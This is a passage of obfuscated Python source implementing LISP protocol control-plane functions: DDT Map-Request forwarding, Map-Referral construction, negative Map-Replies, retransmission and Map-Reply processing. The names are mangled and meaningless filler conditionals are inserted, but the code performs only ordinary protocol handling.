def lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source , port ,
action , eid_prefix , group_prefix ) :
if 23 - 23: iIii1I11I1II1 + OoO0O00 / I1IiiI
I111o0oooO00o0 = map_request . target_eid
oOoooOOO0o0 = map_request . target_group
OO00OO = map_request . nonce
if 48 - 48: OoOoOO00 + I11i + oO0o . I1IiiI
if ( action == LISP_DDT_ACTION_MS_ACK ) : oo0OOoOO0 = 1440
if 7 - 7: iII111i * i1IIi % OoOoOO00 % Ii1I . I1IiiI
if 53 - 53: OOooOOo / I11i + OOooOOo / I1IiiI / OoO0O00
if 12 - 12: i11iIiiIii % ooOoO0o / iII111i . IiII
if 68 - 68: OOooOOo / iIii1I11I1II1 + I1IiiI . ooOoO0o * IiII
OOOOo0ooOoOO = lisp_map_referral ( )
OOOOo0ooOoOO . record_count = 1
OOOOo0ooOoOO . nonce = OO00OO
ii1i1II = OOOOo0ooOoOO . encode ( )
OOOOo0ooOoOO . print_map_referral ( )
if 72 - 72: I1Ii111
iiiiIIiiII1Iii1 = False
if 51 - 51: OoOoOO00
if 61 - 61: Oo0Ooo / i1IIi + I1Ii111 - OoooooooOO / O0
if 25 - 25: I1ii11iIi11i * i11iIiiIii / i1IIi
if 69 - 69: OOooOOo % ooOoO0o - i1IIi . Oo0Ooo
if 35 - 35: iIii1I11I1II1 - I11i / iIii1I11I1II1 % ooOoO0o % I1IiiI
if 46 - 46: oO0o
if ( action == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
eid_prefix , group_prefix , action = lisp_ms_compute_neg_prefix ( I111o0oooO00o0 ,
oOoooOOO0o0 )
oo0OOoOO0 = 15
if 5 - 5: i1IIi % o0oOOo0O0Ooo + OoOoOO00 - I11i . Ii1I
if ( action == LISP_DDT_ACTION_MS_NOT_REG ) : oo0OOoOO0 = 1
if ( action == LISP_DDT_ACTION_MS_ACK ) : oo0OOoOO0 = 1440
if ( action == LISP_DDT_ACTION_DELEGATION_HOLE ) : oo0OOoOO0 = 15
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : oo0OOoOO0 = 0
if 33 - 33: II111iiii * o0oOOo0O0Ooo
iIII111iiII = False
i1ii1I = 0
oo0O0O = lisp_ddt_cache_lookup ( I111o0oooO00o0 , oOoooOOO0o0 , False )
if ( oo0O0O != None ) :
i1ii1I = len ( oo0O0O . delegation_set )
iIII111iiII = oo0O0O . is_ms_peer_entry ( )
oo0O0O . map_referrals_sent += 1
if 42 - 42: I11i / Oo0Ooo + I1IiiI + o0oOOo0O0Ooo
if 100 - 100: iII111i % iII111i + OOooOOo - I1ii11iIi11i % IiII % ooOoO0o
if 57 - 57: Ii1I / IiII / I11i % I1IiiI
if 49 - 49: Oo0Ooo + i1IIi % iII111i - I1IiiI + Ii1I
if 96 - 96: I1ii11iIi11i % Oo0Ooo . OoO0O00 + OoooooooOO + I1ii11iIi11i * OOooOOo
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : iiiiIIiiII1Iii1 = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
iiiiIIiiII1Iii1 = ( iIII111iiII == False )
if 75 - 75: Ii1I * Oo0Ooo % iIii1I11I1II1 . O0 % oO0o
if 4 - 4: I1IiiI - i11iIiiIii / o0oOOo0O0Ooo
if 54 - 54: i11iIiiIii + I1Ii111 . I1Ii111 * I1ii11iIi11i % I1Ii111 - OoooooooOO
if 76 - 76: IiII + i1IIi + i11iIiiIii . oO0o
if 23 - 23: ooOoO0o - OoO0O00 + oO0o . OOooOOo - I1IiiI
OOoo = lisp_eid_record ( )
OOoo . rloc_count = i1ii1I
OOoo . authoritative = True
OOoo . action = action
OOoo . ddt_incomplete = iiiiIIiiII1Iii1
OOoo . eid = eid_prefix
OOoo . group = group_prefix
OOoo . record_ttl = oo0OOoOO0
if 66 - 66: iII111i % iII111i
ii1i1II += OOoo . encode ( )
OOoo . print_record ( " " , True )
if 59 - 59: II111iiii . i1IIi % i1IIi
if 40 - 40: I1Ii111 . II111iiii * o0oOOo0O0Ooo + I11i - i1IIi
if 67 - 67: o0oOOo0O0Ooo - O0 - i1IIi . ooOoO0o . iII111i
if 43 - 43: II111iiii . o0oOOo0O0Ooo + i11iIiiIii . O0 / O0 . II111iiii
if ( i1ii1I != 0 ) :
for I11i1ii11 in oo0O0O . delegation_set :
O0000O00O00OO = lisp_rloc_record ( )
O0000O00O00OO . rloc = I11i1ii11 . delegate_address
O0000O00O00OO . priority = I11i1ii11 . priority
O0000O00O00OO . weight = I11i1ii11 . weight
O0000O00O00OO . mpriority = 255
O0000O00O00OO . mweight = 0
O0000O00O00OO . reach_bit = True
ii1i1II += O0000O00O00OO . encode ( )
O0000O00O00OO . print_record ( " " )
if 13 - 13: Ii1I % i11iIiiIii
if 3 - 3: ooOoO0o % OoOoOO00 * I1Ii111 - OoO0O00 / i1IIi % I1IiiI
if 50 - 50: I1ii11iIi11i + iII111i
if 64 - 64: oO0o
if 11 - 11: o0oOOo0O0Ooo
if 95 - 95: i1IIi . ooOoO0o . Oo0Ooo
if 13 - 13: OOooOOo - Oo0Ooo % O0 . I1Ii111
if ( map_request . nonce != 0 ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , ii1i1II , ecm_source , port )
return
if 66 - 66: I1IiiI + I11i
if 58 - 58: I1ii11iIi11i
if 7 - 7: oO0o - I11i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / OoO0O00 + IiII + i11iIiiIii
if 64 - 64: o0oOOo0O0Ooo * IiII * IiII * iII111i % i11iIiiIii
if 22 - 22: I1ii11iIi11i * II111iiii - OOooOOo % i11iIiiIii
if 10 - 10: OOooOOo / I1ii11iIi11i
if 21 - 21: OoO0O00 % Oo0Ooo . o0oOOo0O0Ooo + IiII
def lisp_send_negative_map_reply ( sockets , eid , group , nonce , dest , port , ttl ,
xtr_id , pubsub ) :
if 48 - 48: O0 / i1IIi / iII111i
lprint ( "Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}" . format ( lisp_print_eid_tuple ( eid , group ) , lisp_hex_string ( nonce ) ,
# iII111i
red ( dest . print_address ( ) , False ) ) )
if 51 - 51: OoO0O00
Ii1II1I = LISP_NATIVE_FORWARD_ACTION if group . is_null ( ) else LISP_DROP_ACTION
if 45 - 45: I1ii11iIi11i + Ii1I * I1ii11iIi11i % Ii1I - O0 * OoooooooOO
if 98 - 98: OoO0O00 / o0oOOo0O0Ooo . OoooooooOO % i11iIiiIii % Oo0Ooo + OoOoOO00
if 49 - 49: II111iiii - OOooOOo - I1IiiI / Ii1I
if 47 - 47: I1ii11iIi11i + OoO0O00
if 95 - 95: I11i . OoOoOO00 / Oo0Ooo % ooOoO0o % II111iiii
if ( lisp_get_eid_hash ( eid ) != None ) :
Ii1II1I = LISP_SEND_MAP_REQUEST_ACTION
if 82 - 82: ooOoO0o - I11i / I1Ii111 - i11iIiiIii - iIii1I11I1II1
if 53 - 53: iIii1I11I1II1 % I11i . i1IIi + IiII / OoOoOO00 . II111iiii
ii1i1II = lisp_build_map_reply ( eid , group , [ ] , nonce , Ii1II1I , ttl , False ,
None , False , False )
if 43 - 43: O0 - IiII + i11iIiiIii * i1IIi - ooOoO0o % IiII
if 23 - 23: OoooooooOO % o0oOOo0O0Ooo + OoO0O00
if 25 - 25: IiII % OOooOOo + Ii1I * I1ii11iIi11i
if 25 - 25: iIii1I11I1II1 * OoOoOO00 % I1IiiI + IiII
if ( pubsub ) :
lisp_process_pubsub ( sockets , ii1i1II , eid , dest , port , nonce , ttl ,
xtr_id )
else :
lisp_send_map_reply ( sockets , ii1i1II , dest , port )
if 34 - 34: ooOoO0o - OoooooooOO . o0oOOo0O0Ooo
return
if 83 - 83: II111iiii . OOooOOo
if 88 - 88: O0
if 12 - 12: Ii1I % OOooOOo % Oo0Ooo * I1Ii111
if 96 - 96: iII111i + ooOoO0o
if 100 - 100: OOooOOo . ooOoO0o + Ii1I + Ii1I
if 70 - 70: ooOoO0o . iIii1I11I1II1 / oO0o
if 18 - 18: Ii1I / OoooooooOO % i1IIi * o0oOOo0O0Ooo
def lisp_retransmit_ddt_map_request ( mr ) :
O0ooO0oOoOo = mr . mr_source . print_address ( )
oO0ooo0O = mr . print_eid_tuple ( )
OO00OO = mr . nonce
if 23 - 23: o0oOOo0O0Ooo * OoO0O00
if 20 - 20: i11iIiiIii * I1ii11iIi11i * ooOoO0o % iIii1I11I1II1 + iII111i
if 51 - 51: O0 - I11i . o0oOOo0O0Ooo + o0oOOo0O0Ooo / I1Ii111
if 32 - 32: II111iiii - Oo0Ooo
if 69 - 69: o0oOOo0O0Ooo * I1ii11iIi11i / o0oOOo0O0Ooo * OoooooooOO
if ( mr . last_request_sent_to ) :
OO0oo = mr . last_request_sent_to . print_address ( )
iiiI11i1ii1i = lisp_referral_cache_lookup ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] , True )
if ( iiiI11i1ii1i and iiiI11i1ii1i . referral_set . has_key ( OO0oo ) ) :
iiiI11i1ii1i . referral_set [ OO0oo ] . no_responses += 1
if 5 - 5: IiII / I1ii11iIi11i + OoO0O00 - II111iiii * OOooOOo
if 23 - 23: I1Ii111 . ooOoO0o . OoO0O00 . OoO0O00 % ooOoO0o * o0oOOo0O0Ooo
if 37 - 37: Ii1I . o0oOOo0O0Ooo
if 34 - 34: ooOoO0o * IiII . Ii1I + iIii1I11I1II1
if 1 - 1: i11iIiiIii + I11i
if 78 - 78: Ii1I % Oo0Ooo / OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: oO0o % I1Ii111
if ( mr . retry_count == LISP_MAX_MAP_NOTIFY_RETRIES ) :
lprint ( "DDT Map-Request retry limit reached for EID {}, nonce 0x{}" . format ( green ( oO0ooo0O , False ) , lisp_hex_string ( OO00OO ) ) )
if 72 - 72: I1IiiI . i11iIiiIii . OoOoOO00 + I1IiiI - I1Ii111 + iII111i
mr . dequeue_map_request ( )
return
if 15 - 15: I1IiiI
if 88 - 88: IiII / I1ii11iIi11i % I11i + i11iIiiIii * O0 . I1Ii111
mr . retry_count += 1
if 69 - 69: Oo0Ooo - OOooOOo / I1IiiI . i11iIiiIii * OoO0O00
o0 = green ( O0ooO0oOoOo , False )
Ii = green ( oO0ooo0O , False )
lprint ( "Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( bold ( "Map-Request" , False ) , "P" if mr . from_pitr else "" ,
# I1IiiI / OOooOOo * Ii1I
red ( mr . itr . print_address ( ) , False ) , o0 , Ii ,
lisp_hex_string ( OO00OO ) ) )
if 50 - 50: OoOoOO00
if 77 - 77: O0 % Ii1I - I1ii11iIi11i
if 17 - 17: OoooooooOO - OoooooooOO % I1Ii111 * Ii1I . OoooooooOO
if 51 - 51: iIii1I11I1II1 % IiII * iIii1I11I1II1 - OoO0O00 % I1IiiI + i11iIiiIii
lisp_send_ddt_map_request ( mr , False )
if 33 - 33: I11i
if 99 - 99: I11i
if 61 - 61: i1IIi - i1IIi
if 97 - 97: I11i + II111iiii / OoooooooOO + I1ii11iIi11i * o0oOOo0O0Ooo
mr . retransmit_timer = threading . Timer ( LISP_DDT_MAP_REQUEST_INTERVAL ,
lisp_retransmit_ddt_map_request , [ mr ] )
mr . retransmit_timer . start ( )
return
if 29 - 29: I1Ii111
if 95 - 95: OoOoOO00 * II111iiii + I1ii11iIi11i - I11i . I11i % i11iIiiIii
if 23 - 23: OoO0O00
if 26 - 26: I1ii11iIi11i
if 66 - 66: i11iIiiIii - i11iIiiIii / Ii1I * OOooOOo / IiII
if 67 - 67: I1IiiI . I1Ii111 - OoOoOO00
if 18 - 18: O0
if 26 - 26: i1IIi - iIii1I11I1II1
def lisp_get_referral_node ( referral , source_eid , dest_eid ) :
if 8 - 8: I1Ii111
if 86 - 86: i1IIi
if 26 - 26: o0oOOo0O0Ooo % I1Ii111 / Oo0Ooo
if 68 - 68: II111iiii / Oo0Ooo / Oo0Ooo
i1111i = [ ]
for IiIiII11 in referral . referral_set . values ( ) :
if ( IiIiII11 . updown == False ) : continue
if ( len ( i1111i ) == 0 or i1111i [ 0 ] . priority == IiIiII11 . priority ) :
i1111i . append ( IiIiII11 )
elif ( i1111i [ 0 ] . priority > IiIiII11 . priority ) :
i1111i = [ ]
i1111i . append ( IiIiII11 )
if 68 - 68: I1IiiI / Ii1I - i11iIiiIii . Oo0Ooo
if 78 - 78: Oo0Ooo * OOooOOo
if 44 - 44: I1Ii111 * I11i / OoO0O00 + o0oOOo0O0Ooo
iIiiIiI1I1ii = len ( i1111i )
if ( iIiiIiI1I1ii == 0 ) : return ( None )
if 63 - 63: Oo0Ooo / IiII % o0oOOo0O0Ooo + I1IiiI - iII111i / iII111i
IiI1I1i1 = dest_eid . hash_address ( source_eid )
IiI1I1i1 = IiI1I1i1 % iIiiIiI1I1ii
return ( i1111i [ IiI1I1i1 ] )
if 88 - 88: O0 * II111iiii
if 81 - 81: OoOoOO00 % I11i / i1IIi
if 87 - 87: II111iiii + oO0o - I1ii11iIi11i
if 42 - 42: Oo0Ooo - ooOoO0o % OoOoOO00 + OoOoOO00
if 61 - 61: I1Ii111
if 67 - 67: I1IiiI / IiII / iII111i - I1Ii111 - o0oOOo0O0Ooo
if 75 - 75: OOooOOo . ooOoO0o
def lisp_send_ddt_map_request ( mr , send_to_root ) :
IiI1i = mr . lisp_sockets
OO00OO = mr . nonce
oo0O0oO0o = mr . itr
III11I1II = mr . mr_source
iiI1Ii1I = mr . print_eid_tuple ( )
if 51 - 51: I1IiiI + O0
if 4 - 4: ooOoO0o / OoO0O00 * iIii1I11I1II1 * iIii1I11I1II1
if 33 - 33: iII111i . iIii1I11I1II1 - Ii1I
if 85 - 85: OoOoOO00
if 57 - 57: Oo0Ooo - II111iiii - I1ii11iIi11i * oO0o
if ( mr . send_count == 8 ) :
lprint ( "Giving up on map-request-queue entry {}, nonce 0x{}" . format ( green ( iiI1Ii1I , False ) , lisp_hex_string ( OO00OO ) ) )
if 41 - 41: I11i / ooOoO0o + IiII % OoooooooOO
mr . dequeue_map_request ( )
return
if 72 - 72: Ii1I
if 22 - 22: o0oOOo0O0Ooo / OoO0O00 + OoOoOO00 + Ii1I . II111iiii * I11i
if 85 - 85: i11iIiiIii / I11i
if 28 - 28: i11iIiiIii + IiII / I11i . Ii1I / OoO0O00
if 100 - 100: o0oOOo0O0Ooo - I11i . o0oOOo0O0Ooo
if 90 - 90: OoOoOO00 / II111iiii / I11i * I11i - iIii1I11I1II1
if ( send_to_root ) :
o0OoOO00O0O0 = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
O0o0000o00oOO = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
mr . tried_root = True
lprint ( "Jumping up to root for EID {}" . format ( green ( iiI1Ii1I , False ) ) )
else :
o0OoOO00O0O0 = mr . eid
O0o0000o00oOO = mr . group
if 80 - 80: iIii1I11I1II1 + I11i / oO0o . I1Ii111 + I11i
if 26 - 26: Oo0Ooo . i11iIiiIii % I1Ii111 . Oo0Ooo + Oo0Ooo + OoOoOO00
if 100 - 100: IiII * I11i - OOooOOo
if 11 - 11: I1IiiI % Ii1I + II111iiii
if 100 - 100: oO0o - II111iiii . o0oOOo0O0Ooo
oOo00OoOoo = lisp_referral_cache_lookup ( o0OoOO00O0O0 , O0o0000o00oOO , False )
if ( oOo00OoOoo == None ) :
lprint ( "No referral cache entry found" )
lisp_send_negative_map_reply ( IiI1i , o0OoOO00O0O0 , O0o0000o00oOO ,
OO00OO , oo0O0oO0o , mr . sport , 15 , None , False )
return
if 65 - 65: I1IiiI - OoO0O00 / iIii1I11I1II1 * iII111i + OoOoOO00 + IiII
if 16 - 16: OoO0O00 % OOooOOo . I11i . I11i
Iii11Ii111II1iiiI = oOo00OoOoo . print_eid_tuple ( )
lprint ( "Found referral cache entry {}, referral-type: {}" . format ( Iii11Ii111II1iiiI ,
oOo00OoOoo . print_referral_type ( ) ) )
if 28 - 28: OOooOOo - I1ii11iIi11i + i1IIi / OoooooooOO
IiIiII11 = lisp_get_referral_node ( oOo00OoOoo , III11I1II , mr . eid )
if ( IiIiII11 == None ) :
lprint ( "No reachable referral-nodes found" )
mr . dequeue_map_request ( )
lisp_send_negative_map_reply ( IiI1i , oOo00OoOoo . eid ,
oOo00OoOoo . group , OO00OO , oo0O0oO0o , mr . sport , 1 , None , False )
return
if 97 - 97: OoOoOO00 * Oo0Ooo - i1IIi * i11iIiiIii * I1IiiI
if 23 - 23: Oo0Ooo
lprint ( "Send DDT Map-Request to {} {} for EID {}, nonce 0x{}" . format ( IiIiII11 . referral_address . print_address ( ) ,
# Ii1I * I1ii11iIi11i * I1IiiI / OoO0O00 + I1IiiI
oOo00OoOoo . print_referral_type ( ) , green ( iiI1Ii1I , False ) ,
lisp_hex_string ( OO00OO ) ) )
if 4 - 4: I11i
if 67 - 67: ooOoO0o . I1Ii111 . Oo0Ooo . Ii1I + iIii1I11I1II1 / OoooooooOO
if 93 - 93: ooOoO0o * OoO0O00 - I1Ii111 / I1ii11iIi11i
if 60 - 60: OoO0O00 / oO0o . I1IiiI + OoOoOO00 + I1ii11iIi11i % Ii1I
oo0oOo0Oo0o0 = ( oOo00OoOoo . referral_type == LISP_DDT_ACTION_MS_REFERRAL or
oOo00OoOoo . referral_type == LISP_DDT_ACTION_MS_ACK )
lisp_send_ecm ( IiI1i , mr . packet , III11I1II , mr . sport , mr . eid ,
IiIiII11 . referral_address , to_ms = oo0oOo0Oo0o0 , ddt = True )
if 53 - 53: O0
if 100 - 100: OoooooooOO . Ii1I / Oo0Ooo
if 69 - 69: iIii1I11I1II1
if 70 - 70: i1IIi % iIii1I11I1II1 % II111iiii % OoO0O00 * o0oOOo0O0Ooo % ooOoO0o
mr . last_request_sent_to = IiIiII11 . referral_address
mr . last_sent = lisp_get_timestamp ( )
mr . send_count += 1
IiIiII11 . map_requests_sent += 1
return
if 1 - 1: OoooooooOO % I11i
if 8 - 8: Ii1I / IiII - i1IIi - Ii1I
if 95 - 95: IiII % I11i % iIii1I11I1II1 . OoO0O00
if 11 - 11: i11iIiiIii - IiII . o0oOOo0O0Ooo / IiII - I1IiiI
if 66 - 66: iIii1I11I1II1 . i1IIi . i11iIiiIii % I1ii11iIi11i * OOooOOo % IiII
if 34 - 34: I1IiiI % I11i - iII111i - i11iIiiIii - iIii1I11I1II1 / i1IIi
if 7 - 7: I1IiiI + iIii1I11I1II1 . oO0o
if 17 - 17: OoO0O00 / OoO0O00 + o0oOOo0O0Ooo / OOooOOo . I1ii11iIi11i % IiII
def lisp_mr_process_map_request ( lisp_sockets , packet , map_request , ecm_source ,
sport , mr_source ) :
if 40 - 40: OoOoOO00
I111o0oooO00o0 = map_request . target_eid
oOoooOOO0o0 = map_request . target_group
oO0ooo0O = map_request . print_eid_tuple ( )
O0ooO0oOoOo = mr_source . print_address ( )
OO00OO = map_request . nonce
if 81 - 81: Ii1I % I1Ii111 / I1ii11iIi11i % iII111i
o0 = green ( O0ooO0oOoOo , False )
Ii = green ( oO0ooo0O , False )
lprint ( "Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}" . format ( "P" if map_request . pitr_bit else "" ,
# iIii1I11I1II1 * O0 / iII111i
red ( ecm_source . print_address ( ) , False ) , o0 , Ii ,
lisp_hex_string ( OO00OO ) ) )
if 75 - 75: Oo0Ooo * IiII % Ii1I
if 40 - 40: o0oOOo0O0Ooo * i11iIiiIii . ooOoO0o
if 63 - 63: I1Ii111 / Ii1I - iIii1I11I1II1 / i11iIiiIii / IiII + I11i
if 57 - 57: iIii1I11I1II1 % iIii1I11I1II1
ii1 = lisp_ddt_map_request ( lisp_sockets , packet , I111o0oooO00o0 , oOoooOOO0o0 , OO00OO )
ii1 . packet = packet
ii1 . itr = ecm_source
ii1 . mr_source = mr_source
ii1 . sport = sport
ii1 . from_pitr = map_request . pitr_bit
ii1 . queue_map_request ( )
if 99 - 99: O0 + O0 / IiII / iII111i + OoOoOO00 % I1IiiI
lisp_send_ddt_map_request ( ii1 , False )
return
if 40 - 40: I1IiiI . I1ii11iIi11i - ooOoO0o / o0oOOo0O0Ooo
if 37 - 37: iII111i * OoOoOO00 % I1ii11iIi11i - I1Ii111
if 13 - 13: Oo0Ooo + Oo0Ooo
if 20 - 20: OoO0O00 * OoOoOO00 . OOooOOo
if 14 - 14: iII111i / i1IIi + II111iiii
if 54 - 54: Ii1I - I1IiiI + iII111i * iII111i
if 78 - 78: I1Ii111
def lisp_process_map_request ( lisp_sockets , packet , ecm_source , ecm_port ,
mr_source , mr_port , ddt_request , ttl ) :
if 79 - 79: IiII * IiII . OOooOOo + iIii1I11I1II1 . II111iiii
IiIIIii1iIII1 = packet
oOOooOoo0O = lisp_map_request ( )
packet = oOOooOoo0O . decode ( packet , mr_source , mr_port )
if ( packet == None ) :
lprint ( "Could not decode Map-Request packet" )
return
if 70 - 70: i1IIi . I11i * o0oOOo0O0Ooo . iII111i
if 75 - 75: oO0o * OoO0O00 * I11i + oO0o + O0 . I1Ii111
oOOooOoo0O . print_map_request ( )
if 8 - 8: I1ii11iIi11i / i1IIi - I1ii11iIi11i + Ii1I + OoO0O00 - I11i
if 79 - 79: OoooooooOO - I1Ii111 * I1IiiI . I1Ii111 - iIii1I11I1II1
if 27 - 27: OoOoOO00 % OoOoOO00 % II111iiii
if 45 - 45: iIii1I11I1II1 . o0oOOo0O0Ooo % I1IiiI
if ( oOOooOoo0O . rloc_probe ) :
lisp_process_rloc_probe_request ( lisp_sockets , oOOooOoo0O ,
mr_source , mr_port , ttl )
return
if 10 - 10: I1IiiI / i1IIi * o0oOOo0O0Ooo + Oo0Ooo - OoOoOO00 % iII111i
if 88 - 88: Ii1I % Ii1I
if 29 - 29: OOooOOo % I1ii11iIi11i
if 57 - 57: I1ii11iIi11i - OoOoOO00 + IiII
if 58 - 58: OOooOOo % I1IiiI / oO0o . ooOoO0o . OoO0O00 / IiII
if ( oOOooOoo0O . smr_bit ) :
lisp_process_smr ( oOOooOoo0O )
if 72 - 72: ooOoO0o + ooOoO0o + o0oOOo0O0Ooo - o0oOOo0O0Ooo % Ii1I
if 52 - 52: I11i % i1IIi . I1ii11iIi11i
if 62 - 62: ooOoO0o - I1ii11iIi11i
if 71 - 71: I11i
if 34 - 34: oO0o / O0 * oO0o
if ( oOOooOoo0O . smr_invoked_bit ) :
lisp_process_smr_invoked_request ( oOOooOoo0O )
if 47 - 47: iIii1I11I1II1 - o0oOOo0O0Ooo % Ii1I
if 38 - 38: ooOoO0o / IiII * I1ii11iIi11i % I1ii11iIi11i % oO0o
if 82 - 82: I1ii11iIi11i . i11iIiiIii - I11i . iII111i / OOooOOo
if 60 - 60: I1IiiI / I1IiiI / II111iiii
if 59 - 59: OOooOOo . oO0o + ooOoO0o % o0oOOo0O0Ooo . i11iIiiIii
if ( lisp_i_am_etr ) :
lisp_etr_process_map_request ( lisp_sockets , oOOooOoo0O , mr_source ,
mr_port , ttl )
if 27 - 27: OoOoOO00 - OoooooooOO / IiII / II111iiii * OOooOOo * ooOoO0o
if 43 - 43: II111iiii . IiII - I1IiiI * I1ii11iIi11i + OoooooooOO
if 34 - 34: I1Ii111 / i1IIi
if 95 - 95: OoOoOO00 * OOooOOo
if 68 - 68: I1Ii111 / iIii1I11I1II1 % Ii1I
if ( lisp_i_am_ms ) :
packet = IiIIIii1iIII1
I111o0oooO00o0 , oOoooOOO0o0 , OoOo0OO = lisp_ms_process_map_request ( lisp_sockets ,
IiIIIii1iIII1 , oOOooOoo0O , mr_source , mr_port , ecm_source )
if ( ddt_request ) :
lisp_ms_send_map_referral ( lisp_sockets , oOOooOoo0O , ecm_source ,
ecm_port , OoOo0OO , I111o0oooO00o0 , oOoooOOO0o0 )
if 26 - 26: oO0o + OoooooooOO % o0oOOo0O0Ooo
return
if 96 - 96: ooOoO0o * OoOoOO00 - II111iiii
if 40 - 40: oO0o * OOooOOo + Ii1I + I11i * Ii1I + OoooooooOO
if 77 - 77: OOooOOo + ooOoO0o / O0
if 16 - 16: ooOoO0o + Oo0Ooo * Oo0Ooo . I11i - IiII
if 49 - 49: ooOoO0o . Ii1I
if ( lisp_i_am_mr and not ddt_request ) :
lisp_mr_process_map_request ( lisp_sockets , IiIIIii1iIII1 , oOOooOoo0O ,
ecm_source , mr_port , mr_source )
if 75 - 75: OOooOOo / II111iiii - Oo0Ooo + I1Ii111
if 42 - 42: OoooooooOO * II111iiii + Ii1I % OoO0O00 / I1Ii111
if 11 - 11: ooOoO0o / Oo0Ooo + i1IIi / IiII
if 4 - 4: iII111i - Oo0Ooo
if 100 - 100: OOooOOo . i1IIi
if ( lisp_i_am_ddt or ddt_request ) :
packet = IiIIIii1iIII1
lisp_ddt_process_map_request ( lisp_sockets , oOOooOoo0O , ecm_source ,
ecm_port )
if 15 - 15: O0 % Oo0Ooo % o0oOOo0O0Ooo . ooOoO0o * iII111i % O0
return
if 31 - 31: i1IIi . Ii1I - OoooooooOO * I11i * ooOoO0o % oO0o
if 61 - 61: I1Ii111 . Ii1I * I1ii11iIi11i
if 59 - 59: OoOoOO00 + Oo0Ooo . I1ii11iIi11i - Ii1I
if 48 - 48: I1Ii111 % Ii1I + I1IiiI * OoooooooOO % OoOoOO00 % i11iIiiIii
if 13 - 13: iII111i % i1IIi
if 13 - 13: iII111i / OoooooooOO + Ii1I / iII111i
if 29 - 29: OOooOOo + ooOoO0o % o0oOOo0O0Ooo
if 18 - 18: I11i + OoO0O00 + OoO0O00 . ooOoO0o
def lisp_store_mr_stats ( source , nonce ) :
ii1 = lisp_get_map_resolver ( source , None )
if ( ii1 == None ) : return
if 37 - 37: i1IIi . IiII + I1IiiI % OoOoOO00
if 3 - 3: i11iIiiIii + Ii1I % IiII - I1Ii111 / Oo0Ooo % iIii1I11I1II1
if 86 - 86: Oo0Ooo + Oo0Ooo * oO0o * I1IiiI
if 95 - 95: IiII - OoO0O00 + OOooOOo
ii1 . neg_map_replies_received += 1
ii1 . last_reply = lisp_get_timestamp ( )
if 33 - 33: o0oOOo0O0Ooo . i11iIiiIii . ooOoO0o
if 100 - 100: i11iIiiIii % I1Ii111 - OoO0O00 + I1Ii111 / i11iIiiIii + OOooOOo
if 55 - 55: i11iIiiIii / I1Ii111 . OOooOOo - OoO0O00
if 60 - 60: OoOoOO00 / i1IIi . Ii1I - OoO0O00 - OoooooooOO
if ( ( ii1 . neg_map_replies_received % 100 ) == 0 ) : ii1 . total_rtt = 0
if 39 - 39: I1IiiI + i1IIi * OoO0O00 % I11i
if 41 - 41: I1ii11iIi11i * IiII
if 16 - 16: I1Ii111 % iIii1I11I1II1 / I1IiiI * OoOoOO00 / IiII / OoOoOO00
if 29 - 29: OoooooooOO / oO0o
if ( ii1 . last_nonce == nonce ) :
ii1 . total_rtt += ( time . time ( ) - ii1 . last_used )
ii1 . last_nonce = 0
if 1 - 1: OoOoOO00 . i11iIiiIii % I1Ii111 + OoooooooOO - Oo0Ooo . I1ii11iIi11i
if ( ( ii1 . neg_map_replies_received % 10 ) == 0 ) : ii1 . last_nonce = 0
return
if 46 - 46: i11iIiiIii + I11i - iIii1I11I1II1 / OoO0O00 - ooOoO0o / i1IIi
if 44 - 44: o0oOOo0O0Ooo + Oo0Ooo
if 46 - 46: OOooOOo % I1IiiI
if 66 - 66: iIii1I11I1II1 . o0oOOo0O0Ooo - ooOoO0o
if 27 - 27: Oo0Ooo - i1IIi * OoooooooOO - OoOoOO00 + OoOoOO00
if 24 - 24: i1IIi . OoOoOO00 / I1Ii111 + O0
if 86 - 86: Ii1I * OoOoOO00 % I1ii11iIi11i + OOooOOo
def lisp_process_map_reply ( lisp_sockets , packet , source , ttl ) :
global lisp_map_cache
if 85 - 85: iII111i % i11iIiiIii
iIiiIIiI1I = lisp_map_reply ( )
packet = iIiiIIiI1I . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Reply packet" )
return
if 78 - 78: i11iIiiIii / I11i / Oo0Ooo + II111iiii - I1ii11iIi11i / I1ii11iIi11i
iIiiIIiI1I . print_map_reply ( )
if 28 - 28: iIii1I11I1II1 / IiII - iIii1I11I1II1 . i1IIi - O0 * ooOoO0o
if 41 - 41: Ii1I + IiII
if 37 - 37: I1Ii111 / o0oOOo0O0Ooo - ooOoO0o - OoooooooOO . I1ii11iIi11i % I1Ii111
if 53 - 53: I1IiiI % OOooOOo + Ii1I - Ii1I
ooOOoOOoOOoOO = None
for i1i1IIIIIIIi in range ( iIiiIIiI1I . record_count ) :
OOoo = lisp_eid_record ( )
packet = OOoo . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Reply packet" )
return
if 50 - 50: ooOoO0o * Ii1I % II111iiii % OOooOOo * OoO0O00
OOoo . print_record ( " " , False )
if 15 - 15: IiII * ooOoO0o % I11i
if 69 - 69: OoO0O00
if 24 - 24: OoO0O00 * iIii1I11I1II1
if 52 - 52: i11iIiiIii + OOooOOo - I11i
if 43 - 43: OoOoOO00
if ( OOoo . rloc_count == 0 ) :
lisp_store_mr_stats ( source , iIiiIIiI1I . nonce )
if 32 - 32: ooOoO0o * OoO0O00 * oO0o / I1ii11iIi11i
if 72 - 72: I1ii11iIi11i * ooOoO0o % I1IiiI % OoOoOO00
O0O0OOoO00 = ( OOoo . group . is_null ( ) == False )
if 4 - 4: i11iIiiIii % OoooooooOO . i11iIiiIii
if 61 - 61: iIii1I11I1II1 . Oo0Ooo . i1IIi
if 45 - 45: I1Ii111
if 49 - 49: i1IIi * iII111i - iIii1I11I1II1 % I11i * O0 / OoOoOO00
if 48 - 48: IiII
if ( lisp_decent_push_configured ) :
Ii1II1I = OOoo . action
